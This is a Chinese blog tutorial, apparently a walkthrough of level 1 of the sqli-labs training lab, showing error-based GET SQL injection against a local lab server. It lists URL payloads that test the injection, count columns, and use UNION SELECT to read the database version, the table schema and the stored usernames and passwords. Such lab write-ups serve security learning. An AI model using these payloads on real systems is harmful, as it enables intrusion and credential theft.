前言:这几天时间就和大家一起研究sqli-labs-master,一起闯关。至于sqli-labs-master的环境搭建我这里就不演示了,可以参考https://blog.csdn.net/Litbai_zhang
的博客自行搭建。
首先来到第一关
http://192.168.89.131/sqli-labs-master/Less-1/
都知道第一关是基于错误的get型注入
先来了解什么是get型注入:在get注入中,首先在?id=n后面加一个’,进行判断是否被过滤且通过返回错误查看是何种诸如类型。字符:”n’”。数字型’’’。
如果没有被过滤就继续使用and 1=1,and 1=2 。可以看出and是否被过滤及确定是否可以注入。现在陈述的是最简单的,不要笑话
知道这些就可以上手操作了。
用语句:http://192.168.89.131/sqli-labs-master/Less-1/?id=1%27来进行测试报错。
提示语法错误
说明我们加的’没有被过滤导致sql语句错误,从而判断是字符型注入
紧接着上面的思路我们继续尝试
用语句:http://192.168.89.131/sqli-labs-master/Less-1/?id=1’ and 1 = 1 %23
得到正常回显
接着用语句:http://192.168.89.131/sqli-labs-master/Less-1/?id=1’ and 1 = 2 %23
无回显。从而得出and没有被过滤及存在注入点
知道存在注入点后,从而进一步注入
首先是猜字段也就是判断当前表的列数:用ORDER BY 语句有了这个思路就开始吧
http://192.168.89.131/sql/sqli-labs-master/Less-1/?id=1’ order by 1 %23
我们以此类推知道猜到4时
http://192.168.89.131/sql/sqli-labs-master/Less-1/?id=1’ order by 4 %23
回显错误,说明只有3个字段。
接下来用SQL UNION 操作符进行联合查询
http://192.168.89.131/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3 %23
这里把username和password对应的输出在两行
用version()看版本:
用database()看当前网站使用的数据库:
http://192.168.89.131/sqli-labs-master/Less-1/?id=-1’ union select 1,version(), database() %23
通过下图可以看到,使用的php版本是5.6.48,该网站使用的数据库名字是security
接下来查看数据库中的表的名称信息:
http://192.168.89.131/sqli-labs-master/Less-1/?id=-1’ union select 1, group_concat(column_name),3 from information_schema.columns where table_name = ‘users’ %23
查看username和password里的内容:
http://192.168.89.131/sqli-labs-master/Less-1/?id=-1’ union select 1,username,password from users %23
我们在看到users表里还看到了id,我们看看有多少组账号密码
只需要在后面加上 where id = n即可
经过测试 id 最大是14
http://192.168.89.131/sqli-labs-master/Less-1/?id=-1’ union select 1,username,password from users where id = 14%23
第一关结束
总结:首先判断是否存在sql注入点,如果存在,构建sql语句查询数据库敏感信息。
本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助
473
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
